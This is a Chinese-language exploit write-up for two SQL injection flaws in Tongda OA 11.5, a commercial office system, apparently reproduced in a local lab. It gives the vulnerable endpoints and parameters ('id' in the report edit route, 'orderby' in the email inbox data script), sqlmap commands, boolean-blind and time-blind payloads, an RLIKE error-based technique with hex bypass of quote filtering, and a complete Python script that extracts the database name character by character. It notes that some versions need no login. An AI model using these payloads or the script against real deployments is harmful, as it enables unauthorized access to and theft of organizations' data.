1, 下载通达OA https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe
(下载完成之后登录 账号 admin 空密码)
2, 创建一个普通账户test:test123456
3, id参数存在sql注入
利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入
参数位置:
/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2
webroot\general\appbuilder\modules\report\controllers\RepdetailController.php,actionEdit
函数中存在一个$_GET["id"]; 未经过滤,拼接到SQL
GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1
Host: 192.168.77.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: PHPSESSID=2jtfe5ckpfh9mklegtgs0t1e73; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=9e1a1f39
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
4, 登录test用户,构造urlhttp://192.168.77.135/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,用burp抓包
5, sqlmap跑,(*号位置写自己的每人都不一样)看cookie值
sqlmap -u "http://localhost/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2" -p "id" --cookie="PHPSESSID=*****; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=*****" --current-db
sqlmap 的payload:布尔盲注:link_type=false&slot={}&id=(SELECT (CASE WHEN (2489=2489) THEN 2 ELSE (SELECT 2530 UNION SELECT 6370) END))
时间盲注:link_type=false&slot={}&id=2 OR (SELECT 4201 FROM (SELECT(SLEEP(5)))birR)
漏洞点2 orderby参数
利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入
位置一,/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3&pagelimit=10&tag=×tamp=1598069103&total=
位置二,/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=&pagelimit=10&tag=×tamp=1598069103&total=
这里使用rlike()报错注入,rlike()是regerp_like()的同义词。rlike遇到特殊字符(和)报错,于是表达式输出1正常回显,表达式错误即输出特殊字符,报错。这里还过滤了单引号,使用16进制绕过,(即为0x28)。
测试语句
3 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)) # 1=1为真,输出1,正常回显
3 RLIKE (SELECT (CASE WHEN (1=2) THEN 1 ELSE 0x28 END)) # 1=2为假,输出0x28,0x28为特殊字符报错
1=1回显正常
1=2报错
写一个脚本自动注入
import requests
import urllib
url = 'http://localhost/general/email/inbox/get_index_data.php'
cookies = "Pycharm-2c6ec227=c1fc5950-b2d3-4880-90f2-e1df25f3514d; USER_NAME_COOKIE=test; SID_65=689c2441; PHPSESSID=jq9lcf0tv2vn13n46rr9dhp1n1; OA_USER_ID=65"
sql = '(select database())'
flag = ''
for i in range(1, 50):
high = 132
low = 32
mid = (high+low)//2
while high > low:
char = flag+chr(mid)
headers = {
"cookie": urllib.parse.unquote(cookies)
}
target = url + "?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3 RLIKE (SELECT (CASE " \
"WHEN (substr({0},{1},1)>={2}) THEN 1 ELSE 0x28 " \
"END))&pagelimit=10&tag=×tamp=1598069103&total= ".format(sql, i, hex(mid))
# print(target)
s = requests.get(url=target, headers=headers)
# print(s.text)
if 'timestamp' in s.text:
low = mid+1
else:
high = mid
mid = (high+low)//2
if mid == 33 or mid ==132:
exit(0)
flag += chr(mid-1)
print("[+] "+flag)
看到爆出来的 库是t0z0a